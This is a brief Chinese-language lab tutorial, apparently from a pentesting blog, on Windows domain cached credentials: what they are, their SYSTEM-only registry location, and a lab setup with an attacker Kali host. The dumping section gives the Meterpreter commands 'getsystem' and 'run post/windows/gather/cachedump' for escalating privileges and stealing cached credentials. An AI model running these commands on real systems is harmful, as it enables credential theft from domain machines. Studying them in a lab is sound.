环境说明
| IP | HOSTNAME | NOTE |
|---|
| 10.10.10.88 | win10_dqy | 域内主机 |
| 172.16.106.71 | KC360_WIN2012_1 | 域控 |
| 172.16.106.67 | kali_dqy | 攻击者主机 |
前言
域缓存凭据简介
- 域缓存凭据:它是缓存在本地注册表中的域凭据,其用于在域控制器不可用的情况下进行用户身份验证。
- 举个例子:你的办公电脑加入了公司的域,你通过域账号登录机器,此时所输入的账号密码将由域控进行验证,验证通过后就能登录这台电脑;但是当你办公电脑断网后,你还能依靠域账号登录机器,此时就是通过域缓存凭据来本地进行身份验证。
存储位置
- 域缓存凭据保存的注册表位置只有System权限可读
HKEY_LOCAL_MACHINE\SECURITY\Cache
- 我们可以通过ProcessHacker或者多种方式来以System权限运行我们的regedit.exe进程,进而可以查看到域缓存凭据
- 方法参考链接如下:
https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/#:~:text=Locate%20a%20program%20or%20service,Click%20OK.

转储过程
获取目标机权限

getsystem

通过cachedump转储域缓存凭据
- 获取到system级别权限之后,我们使用cachedump模块转储域缓存凭据
run post/windows/gather/cachedump
